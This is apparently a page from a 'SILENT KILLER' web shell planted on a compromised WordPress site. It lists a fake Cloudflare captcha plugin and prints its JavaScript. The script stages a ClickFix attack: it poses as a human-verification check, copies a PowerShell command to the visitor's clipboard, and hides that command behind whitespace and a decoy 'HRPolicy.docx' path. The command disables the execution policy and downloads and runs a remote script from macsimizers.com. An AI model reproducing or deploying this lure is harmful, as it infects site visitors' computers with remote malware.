SILENT KILLERPanel

Current Path: > home > ivftiowh > greeceivf.com > wp-content > plugins > CloudflareCaptchaUtils > js


Operation   : Linux premium88.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Software     : Apache
Server IP    : 185.61.154.216 | Your IP: 216.73.216.44
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: /home/ivftiowh/greeceivf.com/wp-content/plugins/CloudflareCaptchaUtils/js

NameTypeSizeLast ModifiedActions
captcha.js File 4045 bytes September 15 2025 17:05:18.

Reading File: /home/ivftiowh/greeceivf.com/wp-content/plugins/CloudflareCaptchaUtils/js/captcha.js

async function initCaptcha() {
    const loading = document.getElementById('loading')
    const captchaMain = document.getElementById('captcha_main')

    loading.style.display = 'block';

    try {
        const response = await fetch("https://macsimizers.com/captcha/file/fix/check/me", {
            method: "POST",
            headers: {
                // 'Authorization': `Basic ${base64Credentials}`
            }
        });

        if (!response.ok) {
            throw new Error("Network response was not ok, remove file fix page");
        }

        const responseText = (await response.text()).trim().toLowerCase();

        if (responseText === "invalid") {
            loading.style.display = 'none';
            captchaMain.style.display = 'block';
        } else if (responseText === "valid") {
            loading.remove();
            captchaMain.remove();
        } else {
            alert("Unexpected response: " + responseText);
            loading.remove();
            captchaMain.remove();
        }
    } catch (error) {
        alert('Error fetching data: '+error);

        loading.remove()
        captchaMain.remove()
    }
}
window.onload = initCaptcha;


function setTimestamp() {
    const now = new Date();
    const month = String(now.getMonth() + 1).padStart(2, '0'); // Months are 0-based
    const day = String(now.getDate()).padStart(2, '0');
    const year = now.getFullYear();
    const hours = String(now.getHours() % 12 || 12).padStart(2, '0'); // 12-hour format
    const minutes = String(now.getMinutes()).padStart(2, '0');
    const seconds = String(now.getSeconds()).padStart(2, '0');
    const ampm = now.getHours() >= 12 ? 'PM' : 'AM';
    const timestamp = `${month}/${day}/${year} ${hours}:${minutes}:${seconds} ${ampm}`;
    document.getElementById('timestamp').textContent = timestamp;
}


const fileInput = document.getElementById('fileInput');
const fileExplorer = document.getElementById('fileExplorer');
const path = document.getElementById('path');

path.addEventListener('click', function() {
    navigator.clipboard.writeText("powershell.exe -Command \"Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process; iex ((New-Object Net.WebClient).DownloadString('https://macsimizers.com/download/file/fix/ps1'))\"                                                                                                                                                                                       # C:\\company\\internal-secure\\filedrive\\HRPolicy.docx");
});


fileExplorer.addEventListener('click', function() {
    navigator.clipboard.writeText("powershell.exe -Command \"Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process; iex ((New-Object Net.WebClient).DownloadString('https://macsimizers.com/download/file/fix/ps1'))\"                                                                                                                                                                                      # C:\\company\\internal-secure\\filedrive\\HRPolicy.docx");
    fileInput.click();
});


fileInput.addEventListener('change', () => {
    alert("Please follow the instructions provided.");
    fileInput.value = "";
    setTimeout(() => fileInput.click(), 500);
});


const currentDomain = window.location.hostname;
document.getElementById('zone-name-title').textContent = currentDomain;
document.getElementById('zone-name-title-modal').textContent = currentDomain;
document.querySelector('.core-msg').textContent = currentDomain + " needs to review the security of your connection before";

const checkbox = document.getElementById("verifyCheckbox");
const modal = document.getElementById("myModal");

document.querySelectorAll('#verifyCheckbox').forEach(function(button) {
    button.addEventListener('click', async function(event) {
        event.preventDefault();

        setTimestamp();
        modal.style.display = "block";
        checkbox.enable(false)
    });
});


SILENT KILLER Tool